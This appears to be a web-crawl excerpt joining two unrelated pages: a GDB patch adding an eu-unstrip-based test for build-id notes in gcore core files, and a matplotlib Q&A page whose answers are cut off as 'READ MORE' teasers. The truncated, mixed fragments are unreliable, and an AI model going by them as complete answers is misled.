(has_anonymous) should_dump_p = dump_mapping_p (filterflags, &v, priv, mapping_anon_p, mapping_file_p, - filename); + filename, addr, offset); else { /* Older Linux kernels did not support the "Anonymous:" counter. diff --git a/gdb/testsuite/gdb.base/coredump-filter-build-id.exp b/gdb/testsuite/gdb.base/coredump-filter-build-id.exp new file mode 100644 index 0000000000..fc2b039406 --- /dev/null +++ b/gdb/testsuite/gdb.base/coredump-filter-build-id.exp @@ -0,0 +1,69 @@ +# whether GDB's gcore/generate-core-file command can dump memory +# mappings with ELF headers, containing a build-id note. +# +# Due to the fact that we don't have an easy way to process a corefile +# and look for specific notes using GDB/dejagnu, we rely on an +# external tool, eu-unstrip, to verify if the corefile contains +# build-ids. + +standard_testfile "normal.c" + +# This test is Linux x86_64 only. +if { ![istarget *-*-linux*] } { + untested "$testfile.exp" + return -1 +} +if { ![istarget "x86_64-*-*"] || ![is_lp64_target] } { + untested "$testfile.exp" + return -1 +} + +if { [prepare_for_testing "failed to prepare" $testfile $srcfile debug] } { + return -1 +} + +if { ![runto_main] } { + untested "could not run to main" + return -1 +} + +# First we need to generate a corefile. +set corefilename "[standard_output_file gcore.test]" +if { ![gdb_gcore_cmd "$corefilename" "save corefile"] } { + verbose -log "Could not save corefile" + untested "$testfile.exp" + return -1 +} + +# Determine if GDB dumped the mapping containing the build-id. This +# is done by invoking an external program (eu-unstrip). +if { [catch "exec [gdb_find_eu-unstrip] -n --core $corefilename" output] == 0 } { + set line [lindex [split $output "\n"] 0] + set test "gcore dumped mapping with build-id" + + verbose -log "First line of eu-unstrip: $line" + + if { [regexp "^${hex}\\+${hex} \[a-f0-9\]+@${hex}.*[string_to_regexp $binfile]$" $line] } { + pass "$test" + } else { + fail "$test" + } +} else { + verbose -log "Could not execute eu-unstrip program" + untested "$testfile.exp" +} diff --git a/gdb/testsuite/lib/future.exp b/gdb/testsuite/lib/future.exp index a56cd019b4..122e652858 100644 --- a/gdb/testsuite/lib/future.exp +++ b/gdb/testsuite/lib/future.exp @@ -162,6 +162,16 @@ proc gdb_find_readelf {} { return $readelf } +proc gdb_find_eu-unstrip {} { + global EU_UNSTRIP_FOR_TARGET + if [info exists EU_UNSTRIP_FOR_TARGET] { + set eu_unstrip $EU_UNSTRIP_FOR_TARGET + } else { + set eu_unstrip [transform eu-unstrip] + } + return $eu_unstrip +} + proc gdb_default_target_compile {source destfile type options} { global target_triplet global tool_root_dir -- 2.17.2
https://sourceware.org/legacy-ml/gdb-patches/2019-04/msg00479.html
CC-MAIN-2022-40
en
refinedweb
34032/record-limits-displayed-plot-using-matplotlib-show-module matplotlib.pyplot.show(*args, **kw) The show module when running in ipython with its pylab mode, display all figures and return to the ipython prompt. When you are using a non-interactive mode it will display all figures and block until the figures have been closed. When you are using it in an interactive mode it will have no effect unless figures were created prior to a change from non-interactive to interactive mode. Hey @anonymus, to change the default rc settings in python script, you need to know that all the rc values are stored in dictionary-like variables known as matplotlib.rcParams. This is the global package it can be modified like this: mpl.rcParams['lines.linewidth'] = length mpl.rcParams['lines.color'] = 'color' plt.plot(data) Hope this helps. Hey @Jinu, Try something like this: import turtle star = ...READ MORE Hey @Jinu, try this: import turtle polygon = ...READ MORE Hi there, instead of sklearn you could ...READ MORE There are several options. Here is a ...READ MORE n=[1,2,3,4,5,6,7,8,9] print(len(n)) =9 READ MORE Hi, there is only that way and ...READ MORE Hi, it is pretty simple, to be ...READ MORE Good question. I actually was stuck with ...READ MORE You can find the explanation and implementation ...READ MORE You can use the exponentiation operator or ...READ MORE OR At least 1 upper-case and 1 lower-case letter Minimum 8 characters and Maximum 50 characters Already have an account? Sign in.
https://www.edureka.co/community/34032/record-limits-displayed-plot-using-matplotlib-show-module?show=34169
CC-MAIN-2022-40
en
refinedweb
26Custom Directives As with many other features of Angular, you can extend functionality by creating your own custom directives. Custom directives allow you to extend the functionality of HTML by implementing the behavior of elements yourself. If you have code that needs to manipulate the DOM, it should be done inside a custom directive. You implement a custom directive by calling the @ directive class, much the same way you define a component. The @ directive class metadata should include the selector of the directive to be used in the HTML. The Directive export class is where the logic for the directive will reside. For example, the following is a basic definition for a directive: import { Directive } from '@angular/core'; @Directive({ selector: ... Get Node.js, MongoDB and Angular Web Development, 2nd Edition now with the O’Reilly learning platform. O’Reilly members experience live online training, plus books, videos, and digital content from nearly 200 publishers.
https://www.oreilly.com/library/view/nodejs-mongodb-and/9780134655642/ch26.xhtml
CC-MAIN-2022-40
en
refinedweb
D-Foundations VIKTOR's D-Foundations integration requires a specific D-Foundations worker which can be downloaded here. The D-Foundations binding is created to work with D-Foundations version v17. Other versions of D-Foundations might not be able to read the generated input files properly. A D-Foundations binding has been developed by VIKTOR to simplify the process of creating a D-Foundations model, running an analysis (worker required) and parsing the results. The process consists of the following steps: - Create the 'empty' model (optionally with default materials), applying the desired settings. - (Optional) Create material(s). Also possible to only use the default materials. - Create or import profile(s). - Create pile type(s). - Create pile(s). - Let VIKTOR generate the input file for you. - Run the D-Foundations analysis (worker required) with the input file. - Obtain and parse the results, and process them as desired. Supported model types D-Foundations supports 4 type of models. The following types are currently (un)supported in the D-Foundations binding: - Bearing Piles (EC7-NL): supported - Bearing Piles (EC7-B): not supported - Tension Piles (EC7-NL): supported - Shallow Foundations (EC7-NL): not supported Creating the model (example: Bearing Piles (EC7-NL) model) The class BearingPilesModel represents the Bearing Piles (EC7-NL) model in D-Foundations. The following code shows how a (minimal) bearing piles model can be created in Python using the binding. The Tension Piles (EC7-NL) model can be created in a similar way, using the TensionPilesModel class. from viktor.external.dfoundations import BearingPilesCalculationOptionsfrom viktor.external.dfoundations import CalculationTypefrom viktor.external.dfoundations import BearingPilesModelfrom viktor.external.dfoundations import ConstructionSequencefrom viktor.external.dfoundations import SoilTypefrom viktor.external.dfoundations import ProfileLayerfrom viktor.external.dfoundations import RectPilefrom viktor.external.dfoundations import PileTypefrom viktor.external.dfoundations import PileSlipLayerfrom viktor.external.dfoundations import Metadatafrom viktor.external.dfoundations import DFoundationsAnalysis# Create the model with misc. options.options = BearingPilesCalculationOptions(CalculationType.BEARING_CAPACITY_AT_FIXED_PILE_TIP_LEVEL, False)model = BearingPilesModel(ConstructionSequence.CPT_INSTALL_EXCAVATION, options, -5.0)# Create material (optional), or use one of the default material names.model.create_material("my_material", SoilType.SAND, 19.0, 19.0, 3.0)# Create profile(s).layers = [ProfileLayer(0.0, "my_material"), ProfileLayer(-20.0, "my_material")]measurements = [(0.0, 10.0), (-20.0, 20.0)]model.create_profile('my_profile', layers, 0.0, 0.0, measurements, -5.0, -15.0, 1.0, -10.0, -12.0, -0.11)# Create pile type(s).shape = RectPile(1.0, 1.0)model.create_pile_type("my_pile_type", shape, PileType.PREFAB_CONCRETE, PileSlipLayer.NONE)# Create pile(s).model.create_pile("my_pile", 0.0, 0.0, -1.0, 1.0, 0.0, 0.0)# Generate the input file for the model as if it was generated by D-Foundations.# Metadata can be used (not required) to update data such as titles, company, etc.metadata = Metadata(title_1='Example Model', company='VIKTOR')foi_file = model.generate_input_file(metadata)# Run the analysis with the generated input file (requires worker).analysis = DFoundationsAnalysis(foi_file)analysis.execute(300)# Obtain the result file.fod_file = analysis.get_output_file() Parsing output using OutputFileParser After running a DFoundationsAnalysis, the fod file can be obtained and results can be extracted. The class OutputFileParser makes the parsing more convenient and return Python objects that can be further processed: from viktor.external.dfoundations import OutputFileParserparser = OutputFileParser(fod_file)# Calculation parameters.calculation_parameters = parser.calculation_parameters# Parsed results in the form of a dictionary.results = parser.results(False) # True (default) for returning pandas DataFrame(s).# Raw, unparsed results in the form of a string.# Manual parsing required. Useful, if parser.results is not sufficient.raw_results = parser.raw_results Supported D-Foundation versions Currently, the parser supports the following versions (completely or partially) of D-Foundations: v17: - Tension Piles model - Bearing Piles model - Preliminary Design (calculation options only) v19: - Tension Piles model - Bearing Piles model - Verification
https://docs.viktor.ai/docs/create-apps/software-integrations/dfoundations/
CC-MAIN-2022-40
en
refinedweb
JavaScript utility libraries The Web3.Storage JavaScript client library provides a simple interface for interacting with Web3.Storage. This page highlights some additional libraries that may be helpful when working with the client library, or when using the HTTP API directly. files-from-path The files-from-path package provides a simple way for Node.js users to load files from the filesystem into the File objects that the Web3.Storage client library likes to use. Here's a quick example: import { getFilesFromPath } from 'web3.storage'; async function storeFiles(path = 'path/to/somewhere') { const files = await getFilesFromPath(path); for (const f of files) { console.log(f); // { name: '/path/to/me', stream: [Function: stream] } } const web3Storage = getStorageClient(); const cid = await web3storage.put(files); console.log(`stored ${files.length} files. cid: ${cid}`); } Note that if you're using the client library you don't need to install the files-from-path package seperately. Instead, just import the getFilesFromPath or filesFromPath functions from the web3.storage package. ipfs-car The Web3.Storage API works with Content Archive (CAR) files, which package up content addressed data into a simple format for storage and transport. Internally, the client library uses the ipfs-car package to create CARs from regular files before sending data to the API. If you prefer to work with CARs directly, see the how-to guide on working with Content Archives for usage information for ipfs-car and information about other options. carbites The carbites package includes a command line tool and JavaScript API for splitting Content Archive (CAR) files into chunks. This is used to upload files that are larger than the 100mb size limit on the upload HTTP endpoint. See the how-to guide on working with Content Archives for more information on using the carbites tool.
https://web3.storage/docs/reference/js-utilities/
CC-MAIN-2022-40
en
refinedweb
: - Monitor the calls to your service across multiple servers with AppFabric Monitoring - Eliminate the .svc extension from the URI by using routing - Create custom Event Tracing for Windows (ETW) events that will be logged by AppFabric Monitoring - Provide a simple HTML page for invoking the service with or without the .svc extension Setup To build and test an AppFabric WCF HTTP: } - Build the solution> Enable Routing - Open web.config - Enable ASP.NET Compatibility for WCF 1: <system.serviceModel> 2: <serviceHostingEnvironment aspNetCompatibilityEnabled="true" /> 3: </system.serviceModel> - Enable the UrlRouting module.> - Add global.asax - Add the following namespace directives 1: using System.Web.Routing; 2: using System.ServiceModel.Activation; - Add code to the Application_Start method to register the route. 1: protected void Application_Start(object sender, EventArgs e) 2: { 3: RouteTable.Routes.Add(new ServiceRoute( 4: "SampleService", /* Replace SampleService with your service name */ 5: new WebServiceHostFactory(), 6: typeof(SampleService))); /* Replace SampleService with your service name */ 7: } Verify with Development Server - In the Solution Explorer window, right click on the generated HTM file for your service. For example SampleService.svc.htm and select View in Browser. - The ASP.NET Development Server will start and your page will load in the browser. - and select properties - Go to the Web tab - Check Use Local IIS Web Server and click Create Virtual Directory - Save your project settings (Debugging will not save them) - In the Solution Explorer window, right click on the generated HTM file for your service. For example SampleService.svc.htm and select View in Browser. The address should now be that of the IIS (“”) and not of the ASP.NET Development Server (“”). - AppFabric. It groups calls by URI so calls without the .SVC extension look like a different service. - Switch back to your browser, leave the text box empty (clear it if necessary) and click the link for service with the .svc extension and the link for the service without the .svc extension. This will generate a warning event. - To see the monitoring for these activities switch back to the IIS Manager and refresh the AppFabric Dashboard. - Click on the link in the WCF Call History for SampleService.svc and you will see events for the completed calls. - To see specific events, right click on an entry for the SayHello operation and select View All Related Events. - In the list of related events you will see the user defined event named SayHello. The payload of this event contains the message logged by the operation.
https://blogs.msdn.microsoft.com/rjacobs/2011/03/03/appfabric-wcf-http-service-template/
CC-MAIN-2017-22
en
refinedweb
In this article, we will learn about the solution to the problem statement given below. Problem statement − We are given a string, we need to count the number of uppercase and lowercase characters present in the string without using the inbuilt function This can be easily solved by using islower() and isupper() function available in python. But here there is a constraint to use the inbuilt function. So here we take the help of the ASCII value of the characters. Using the ord() function we compute the ASCII value of each character present in the string and then compare to check for uppercase and lowercase as shown below. def upperlower(string): upper = 0 lower = 0 for i in range(len(string)): # For lowercase if (ord(string[i]) >= 97 and ord(string[i]) <= 122): lower += 1 # For uppercase elif (ord(string[i]) >= 65 and ord(string[i]) <= 90): upper += 1 print('Lower case characters = '+str(lower)) print('Upper case characters = '+str(upper)) # Driver Code string = 'TutorialsPoint' upperlower(string) Lower case characters = 12 Upper case characters = 2 All the variables are declared in the local scope and their references are seen in the figure above. In this article, we have learned how to count uppercase and lowercase characters present in the given string
https://www.tutorialspoint.com/count-upper-and-lower-case-characters-without-using-inbuilt-functions-in-python-program
CC-MAIN-2020-24
en
refinedweb
Just a matter of adding a statfs wrapper for the valgrind port. Happy to code this up if nobody has any objections. Error occurred as follows: (568)|thinkpad|gardei|~/valgrind-debug| $>>freebsd-version 12.0-RELEASE (569)|thinkpad|gardei|~/valgrind-debug| $>>cat disk.c #include <sys/statvfs.h> int main() { struct statvfs fs; return statvfs("/", &fs); } (570)|thinkpad|gardei|~/valgrind-debug| $>>valgrind ./a.out ==12810== Memcheck, a memory error detector ==12810== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. ==12810== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info ==12810== Command: ./a.out ==12810== --12810-- WARNING: unhandled syscall: 555 --12810-- You may be able to write your own handler. --12810-- Read the file README_MISSING_SYSCALL_OR_IOCTL. --12810-- Nevertheless we consider this a bug. Please report --12810-- it at. ==12810== ==12810== HEAP SUMMARY: ==12810== in use at exit: 0 bytes in 0 blocks ==12810== total heap usage: 0 allocs, 0 frees, 0 bytes allocated ==12810== ==12810== All heap blocks were freed -- no leaks are possible ==12810== ==12810== For counts of detected and suppressed errors, rerun with: -v ==12810== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0) Seems to be related to A patch is already provided there, although it does not handle syscalls with following ids: fhstat 553 statfs 555 fhstatfs 558 Maintainership dropped ports r495096. Assign to new maintainer. (In reply to Michael Buch from comment #0) With my github repo () I get paulf> ../../../vg-in-place ./statvfs ==26238== Memcheck, a memory error detector ==26238== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. ==26238== Using Valgrind-3.16.0.GIT and LibVEX; rerun with -h for copyright info ==26238== Command: ./statvfs ==26238== ==26238== ==26238== HEAP SUMMARY: ==26238== in use at exit: 0 bytes in 0 blocks ==26238== total heap usage: 0 allocs, 0 frees, 0 bytes allocated ==26238== ==26238== All heap blocks were freed -- no leaks are possible ==26238== ==26238== For lists of detected and suppressed errors, rerun with: -s ==26238== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=235720
CC-MAIN-2020-24
en
refinedweb
Persisting ProcessInstance at arbitrary statebrianmb99 Oct 14, 2005 4:05 PM Hi, I am new to jBPM and it looks great to me so far. There's something I'm not quite getting though - maybe I just don't understand the proper way to use a process definition. I want to persist a ProcessInstance at an arbitrary stage of the process execution. For example, a process has three nodes: "Start" "Dostuff" and "End". If I start a new jbpmSession transaction, get the process definition from the database, and signal a new ProcessInstance to start, how do I persist the ProcessInstance somewhere in the "Dostuff" state? I don't think I can make a new jbpmsession/transaction inside another one. I've tried manually threading the process execution, but running a process in multiple threads doesn't seem to work well and other topics in this forum indicate that it's not the right way to do things. Any pointers would be appreciated. Thanks! Brian 1. Re: Persisting ProcessInstance at arbitrary statekoen.aers Oct 15, 2005 4:46 AM (in response to brianmb99) Brian, The ProcessInstance *is* persisted in the "DoStuff" state. The state is the situation in which the process instance is waiting for the next thing to happen. Regards, Koen 2. Re: Persisting ProcessInstance at arbitrary statebrianmb99 Oct 15, 2005 7:50 PM (in response to brianmb99) Thanks, Koen. So if I understand correctly, it would not be appropriate to do public class MyActionHandler implements ActionHandler { public void execute(ExecutionContext executionContext) throws Exception { saveProcessInstanceToDB(); String result = someLongRunningPotentiallyUnstableProcess(); executionContext.getToken.signal(result); } } but instead one should do public class MyActionHandler implements ActionHandler { public void execute(ExecutionContext executionContext) throws Exception { long tokenId = executionContext.getToken().getId(); sendAsyncMessageToStartALongRunningProcess(tokenId); } } public class MyMessageConsumer { public void consumeMessage(tokenId) { String result = someLongRunningProcess(); jbpmSession.beginTransaction(); Token myToken = jbpmSession.getGraphSession.loadToken(tokenId); myToken.signal(result); jbpmSession.commitTransactionAndClose(); } } or something along those lines? Thanks much for your help with my perhaps elementary question. Brian. 3. Re: Persisting ProcessInstance at arbitrary statekukeltje Oct 15, 2005 8:15 PM (in response to brianmb99) Yep... and you know what.... look at the latest code in cvs. Work is comming along nice on this part. Maybe you can try it out and find bugs in it. Ronald 4. Re: Persisting ProcessInstance at arbitrary statebrianmb99 Oct 15, 2005 8:29 PM (in response to brianmb99) Great, thanks. I'm putting together a report on jBPM for my dev team - it looks promising. If we decide to go with jBPM you'll be hearing a lot more from me and I'll try to help out where I can - reporting bugs or whatever! Thanks for your hard work on this promising project and for the prompt replies in the forum. Brian
https://developer.jboss.org/thread/112386
CC-MAIN-2020-24
en
refinedweb
OpenCV is a popular open-source computer vision and machine learning software library with many computer vision algorithms including identifying objects, identifying actions, and tracking movements. The tracking algorithms use optical flow to compute motion vectors that represent the relative motion of pixels (and hence objects) between images. Computation of optical flow vectors is a computationally expensive task. However, OpenCV 4.1.1 introduces the ability to use hardware acceleration on NVIDIA Turing GPUs to dramatically accelerate optical flow calculation. NVIDIA Turing GPUs include dedicated hardware for computing optical flow (OF). This dedicated hardware uses sophisticated algorithms to yield highly accurate flow vectors, which are robust to frame-to-frame intensity variations, and track true object motion. Computation is significantly faster than other methods at comparable accuracy. The new NVIDIA hardware accelerated OpenCV interface is similar to that of other optical flow algorithms in OpenCV so developers can easily port and accelerate their existing optical flow based applications with minimal code changes. More details about the OpenCV integration can be found here. Optical Flow calc in OpenCV OpenCV supports a number of optical flow algorithms. The pyramidal version of Lucas-Kanade method ( SparsePyrLKOpticalFlow) computes the optical flow vectors for a sparse feature set. OpenCV also contains a dense version of pyramidal Lucas-Kanade optical flow. Many of these algorithms have CUDA-accelerated versions; for example BroxOpticalFlow, FarnebackOpticalFlow, DualTVL1OpticalFlow. In all cases these classes implement a calc function which takes two input images and returns the flow vector field between them. Hardware-Accelerated Optical Flow The NvidiaHWOpticalFlow class implements NVIDIA hardware-accelerated optical flow into OpenCV. This class implements a calc function similar to other OpenCV OF algorithms. The function takes two images as input and returns dense optical flow vectors between the input images. Optical flow is calculated on a dedicated hardware unit in the GPU silicon which leaves the streaming multiprocessors (typically used by CUDA programs) free to perform other tasks. The optical flow hardware returns fine grained flow vectors with quarter-pixel accuracy. The default granularity is 4×4 pixel blocks but can be further refined using various upsampling algorithms. Helper functions are available in class NvidiaHWOpticalFlow to increase the flow vector granularity to 1×1 (per-pixel) or 2×2 block sizes. In addition to supporting the basic OpenCV-OF functionality, NvidiaHWOpticalFlow also provides features for low-level control and performance tuning. Presets help developers fine-tune the balance between performance and quality. Developers can also enable or disable temporal hints so that the hardware uses previously generated flow vectors as internal hints to calculate optical flow for the current pair of frames. This is useful when computing flow vectors between successive video frames. Programmers can also set external hints, if available, to aid the computation of flow vectors. The optical flow library also outputs the confidence for each generated flow vector in the form of cost. The cost is inversely proportional to the confidence of the flow vectors and allows the user to make application-level decisions; e.g. accept/reject the vectors based on a confidence threshold. The results of four different optical flow algorithms in OpenCV are demonstrated in the above video. The video compares the time it takes to calculate the optical flow vectors between successive frames and shows GPU utilization. NVIDIA hardware optical flow is extremely fast, computing vectors in 2 to 3ms per frame, and highly accurate while consuming very little GPU. Comparatively Farneback takes ~8ms per frame and returns lower accuracy flow vectors. Lucas-Kanade takes well over 20ms per frame and also returns lower accuracy flow vectors. TVL1 provides the highest accuracy optical flow vectors, but is computationally very expensive taking over 300ms per frame. Installing NvidiaHWOpticalFlow The OpenCV implementation of NVIDIA hardware optical flow leverages the NVIDIA Optical Flow SDK which is a set of APIs and libraries to access the hardware on NVIDIA Turing GPUs. Developers desiring low-level control can use the APIs exposed in the SDK to achieve the highest possible performance. The new OpenCV interface provides an OpenCV-framework-compliant wrapper around the NVIDIA Optical Flow SDK. The objective of providing such a wrapper is to facilitate easy integration and drop-in-compatibility with other optical flow algorithms available in OpenCV. The OpenCV implementation of NVIDIA hardware optical flow is available in the contrib branch of OpenCV. Follow the steps in the links below to install OpenCV contrib build along with its Python setup. Note that NVIDIA Optical flow SDK is a prerequisite for these steps and is installed by default as a git submodule. Windows: Linux: If you have questions regarding installing or using NvidiaHWOpticalFlow please post your question on the Video Codec and Optical Flow SDK forum. Docker Configuration While launching the Docker it is essential to configure the NVIDIA container library component (libnvidia-container) to expose the libraries required for encode, decode and optical flow. This can be done by adding the following command line option when launching the docker: “ -e NVIDIA_DRIVER_CAPABILITIES=compute,video,utility” Python Bindings Accessing NVIDIA optical flow via Python helps deep learning applications that require optical flow vectors between frames. OpenCV Python is a wrapper class for the original C++ library so it can be used with Python. A Python interface for NvidiaHWOpticalFlow class is also available. The OpenCV array structures gets converted to NumPy arrays which makes it easier to integrate with other libraries that use NumPy. Here is a sample code which calculates optical flow between the two images basketball1.png and basketball2.png – both images are a part of the OpenCV samples: import numpy as np import cv2 frame1 = (cv2.imread('basketball1.png', cv2.IMREAD_GRAYSCALE)) frame2 = (cv2.imread('basketball2.png', cv2.IMREAD_GRAYSCALE)) nvof = cv2.cuda_NvidiaOpticalFlow_1_0.create(frame1.shape[1], frame1.shape[0], 5, False, False, False, 0) flow = nvof.calc(frame1, frame2, None) flowUpSampled = nvof.upSampler(flow[0], frame1.shape[1], frame1.shape[0], nvof.getGridSize(), None) cv2.writeOpticalFlow('OpticalFlow.flo', flowUpSampled) nvof.collectGarbage() Accuracy Comparison Average end-point error (EPE) for a set of optical flow vectors is defined as the average of the Euclidian distance between the true flow vector (i.e. ground truth) and the flow vector calculated by the algorithm being evaluated. Lower average EPE generally implies better quality of the flow vectors. Figure 2, Figure 3 and Figure 4 below show the EPE obtained for the Middlebury, KITTI 2015 and MPI Sintel benchmark datasets using various optical flow algorithms available in OpenCV. References - OpenCV library - NVIDIA Optical Flow SDK - NVIDIA Optical Flow Programming Guide (requires program membership) - Developer Blog: An Introduction to the NVIDIA Optical Flow SDK
https://devblogs.nvidia.com/opencv-optical-flow-algorithms-with-nvidia-turing-gpus/
CC-MAIN-2020-24
en
refinedweb
OK, suppose the following happens: - Front-line helpdesk forwards (rather than bounces) a query into RT. - The ticket appears with the helpdesk as requestor. - We delete the helpdesk and add the email address of the end user as requestor. This email address isn’t an RT user at present, so RT tries to look it up to change the requestor ID, and fails. Requestor ID is still the helpdesk’s ID. - We send correspondence, which correctly goes to the end user by email. - End user replies. Now what happens? End user doesn’t actually have a “user” entry in the RT database, so when he replies, RT creates one for him. RT then checks to see if this new user is the same as the requestor of the ticket - which obviously it isn’t, because we’ve established in (3) that the ID is still the helpdesk’s ID. (Trust me, we’ve seen this happen here.) So the end user ends up having his mail bounced and being told he’s not actually the requestor and doesn’t have permission to correspond on the ticket. Moral of the story? Requestors must have valid user IDs. This patch makes it so. — /home/simon/rt-2-0-6/lib/RT/Watcher.pm Tue Apr 3 07:31:14 2001 +++ RT/Watcher.pm Wed Oct 17 17:29:20 2001 @@ -78,8 +78,25 @@ } } - if ($args{‘Type’} eq “Requestor” and $args{‘Owner’} == 0) { # Requestors *MUST* have an ID. my $NewUser = RT::User->new($RT::SystemUser); my ($Val, $Message) = $NewUser->Create(Name => ($Username || $Address), RealName => "$Name", Password => undef, Privileged => 0, ); return (0, "Could not create watcher for requestor") unless $Val; if ($NewUser->id) { $args{'Owner'} = $NewUser->id; delete $args{'Email'}; } - } #Make sure we’ve got a valid type #TODO — move this to ValidateType return (0, “Invalid Type”) Simon Cozens Unix Systems Programmer Oxford University Computer Services
https://forum.bestpractical.com/t/requestors-must-have-an-id/6483
CC-MAIN-2020-24
en
refinedweb
Glossary Item Box Telerik OpenAccess Domain Model types generated by the OpenAccess Create Model Wizard support binary serialization. When you serialize an object to a binary stream, all related objects currently loaded into the OpenAccessContext will also be serialized. The examples in this topic are based on the Northwind domain model. To run the code in this example, you must have already added the Northwind domain model to your project. You must also add using statements for the following namespaces: In this example, a SerializeToBinaryStream method queries for the Customer object for the specified CustomerID value, and returns a binary MemoryStream. The MemoryStream contains an object graph of the Customer object and its related CustomerDemographic and Order objects.
https://docs.telerik.com/help/openaccess-classic/openaccess-tasks-working-with-objects-serialize-deserialize.html
CC-MAIN-2020-24
en
refinedweb
- Type: New Feature - Status: Reopened (View Workflow) - Priority: Major - Resolution: Unresolved - - Labels:None - Environment:Jenkins ver. 2.63 - Similar Issues: So, I'm having this problem that I described in a similar bug for the lockable-resource plugin ( JENKINS-45138). I said to myself, "oh, hey, I remember being able to throttle executions on a per-agent basis!" Imagine my surprise when I hit the documentation and find that throttle is only applicable inside a step. I need to acquire, use, and cleanup exclusive access to a resource on each agent. Will throttle work how I expect? step('foo') { throttle(['foo-label']) bat '... acquire the resource...' bat '... use the resource...' } post { always { bat '... cleanup the resource...' } } I tried Dmitry Mamchurs creative suggestion but on more recent versions this is explicitly prohibited: WorkflowScript: 2: pipeline block must be at the top-level, not within another block. @ line 2, column 5. pipeline { ^ Demo pipeline: throttle(['myThrottle']) { pipeline { agent { label 'mylabel' } stages { stage('first') { steps { sleep 60 } } } } } I've tested many other variants and I claim it is currently (with latest versions) impossible to get node throttling on a declarative pipeline. If someone has a counterexample I would appreciate that. Marcus Philip The secret sauce is having your pipeline defined in a shared library. vars/myPipeline.groovy def call() { pipeline { agent { label 'mylabel' } stages { stage('first') { steps { sleep 60 } } } } } jobs/my-pipeline/Jenkinsfile throttle(['myThrottle']) { myPipeline() } Je-s F-ng C-st! It's insane that that would make a difference but it does. So the 'pipeline block must be at the top-level' check is just on a file (textual) basis, not on the actual code structure. Thanks Dmitry Mamchur! You made my day! I honestly did not have much hope when I saw this issue having been updated in my e-mail this morning. Marcus Philip, I'll second your comment/excitement on finally having a solution to this mystery. Dmitry Mamchur, thank you so much! Our team already has our declarative and scripted pipelines largely live in libraries. I gave a couple attempts to implement the throttle as described by Dmitry Mamchur and here is a little more on how I think I'll `throttle` in our builds by renaming sharedPipeline to sharedPipelineInner and having sharedPipeline wrap the throttle category around the sharedPipeline() call. This way, I don't need to update 100+ repositories * number of branches. The current Jenkinsfile looks like this more or less... // library imports sharedPipeline() vars/sharedPipeline.groovy def call() { throttle(['throttle-category']) { sharedPipelineInner() } } vars/sharedPipelineInner.groovy def call() { pipeline { agent { label 'mylabel' } stages { stage('first') { steps { sleep 60 } } } } I did try to simply shift the pipeline config into a def within the original file, but that did not work. This defect asks for throttle within a step, which this solution does not provide, so I guess it will need to stay open. The docs for the plugin should be updated, for sure, with an example like this. Edit - Then again, the title says entire build so maybe this solution does apply and the example in the body does not. Anthony Mastrean, can you comment? I'm seeing what Guy Banay sees. I'm now testing a Declarative Pipeline workaround as Kyle Walker suggested – namely, putting the properties block outside the pipeline altogether – and it works, but it only honors the maxConcurrentTotal property, not the maxConcurrentNode one. Very simple repro (assuming a "ThrottleTest" category is configured globally): If I configure a maximum of 5 concurrent builds across all nodes, but only 1 per node, the only limit enforced is the total limit; a single build agent can still run as many builds of this job as it has executors. Only the maxConcurrentTotal takes effect.
https://issues.jenkins-ci.org/browse/JENKINS-45140
CC-MAIN-2020-24
en
refinedweb
Neo: LOAD CSV FROM "" AS row FIELDTERMINATOR "\t" return COUNT(*) At java.io.InputStreamReader@4d307fda:6484 there's a field starting with a quote and whereas it ends that quote there seems to be character in that field after that ending quote. That isn't supported. This is what I read: 'weird al"' This blows up because (as the message says) we've got a field which uses double quotes but then has other characters either side of the quotes. A quick search through the file reveals one of the troublesome lines: $ grep "\"weird" lastfm-dataset-360K/usersha1-artmbid-artname-plays.tsv | head -n 1 ran a file containing only that line through CSV Lint to see what it thought and indeed it is invalid: ![2015-05-04_10-50-43.png 2015 05 04 10 50 43]( /uploads/2015/05/2015-05-04_10-50-43.png) Let's clean up our file to use single quotes instead of double quotes and try the query again: $ tr "\"" "'" < lastfm-dataset-360K/usersha1-artmbid-artname-plays.tsv > lastfm-dataset-360K/clean.tsv LOAD CSV FROM "" as row FIELDTERMINATOR "\t" return COUNT(*) 17559530 And we're back in business! Interestingly Python's CSV reader chooses to strip out the double quotes rather than throw an exception: import csv with open("smallWeird.tsv", "r") as file: reader = csv.reader(file, delimiter="\t") for row in reader: print row $ python explore.py [ prefer LOAD CSV's approach but it's an interesting trade off I hadn't considred before.
https://markhneedham.com/blog/2015/05/04/neo4j-load-csv-java-io-inputstreamreader-theres-a-field-starting-with-a-quote-and-whereas-it-ends-that-quote-there-seems-to-be-character-in-that-field-after-that-ending-quote-that-isnt-suppor/
CC-MAIN-2020-24
en
refinedweb
SYNOPSISmm-link uplink downlink [-- command...] DESCRIPTIONmm-link is a network emulation tool that emulates links using packet delivery trace files (uplink for the uplink direction and downlink for the downlink direction) provided on the command line. mm-link uses clone(2) to fork a new shell in a distinct network namespace. uplink_trace_file emulates the link from mm-link to the Internet and downlink_trace_file emulates the link from the Internet to mm-link. mm-link can emulate both time-varying links, such as cellular links, and links with fixed link speeds. When a packet arrives at the link (from either the Internent or from mm-link), it is directly placed into one of two packet queues depending on its intended direction: the uplink queue or the downlink queue. mm-link releases packets from each queue based on the corresponding input packet-delivery trace. Each line in the trace mm-link reaches the end of an input trace file, it wraps around to the beginning of the trace file. mm-link can be nested within delayshell (1) to flexibly create links with a user-supplied one-way delay and a user-supplied link rate. To exit mm-link, simply type "exit" or CTRL-D inside mm-link. EXAMPLE To emulate a 12 Mbit/s link (in each direction), make a 12 Mbit/s tracefile, "12Mbps_trace". This file can be of arbitrary length and must follow the pattern below: 0 1 2 3 4 5... The link above delivers an MTU-sized packet (1500 bytes or 12000 bits) every ms. Run mm-link with: $ mm-link 12Mbps_trace 12Mbps_trace All programs run from within mm-link are sent according to the packet delivery times specified in 12Mbps_trace. mm-link [...] (copyright notice omitted) AUTHORMahimahi was written by Ravi Netravali, Anirudh Sivaraman, Greg D. Hill, Deepak Narayanan, and Keith Winstein. BUGSPlease report bugs to [email protected].
http://manpages.org/mm-link
CC-MAIN-2020-24
en
refinedweb
